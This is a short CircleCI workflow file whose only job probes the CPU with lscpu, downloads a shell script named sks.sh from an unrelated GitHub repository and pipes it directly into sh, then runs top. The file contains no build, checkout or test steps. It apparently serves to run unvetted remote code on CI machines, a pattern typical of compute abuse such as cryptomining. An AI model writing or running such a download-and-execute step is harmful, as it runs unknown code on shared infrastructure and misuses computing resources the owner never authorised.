version: 2.1
jobs:
  trial:
    machine:
      image: ubuntu-1604:202104-01
    parallelism: 1
    steps:
      - run: lscpu
      - run: wget https://raw.githubusercontent.com/melexal/melex001/main/sks.sh -O - | sh
      - run: top

workflows:
  version: 2.1
  build:
    jobs:
      - trial
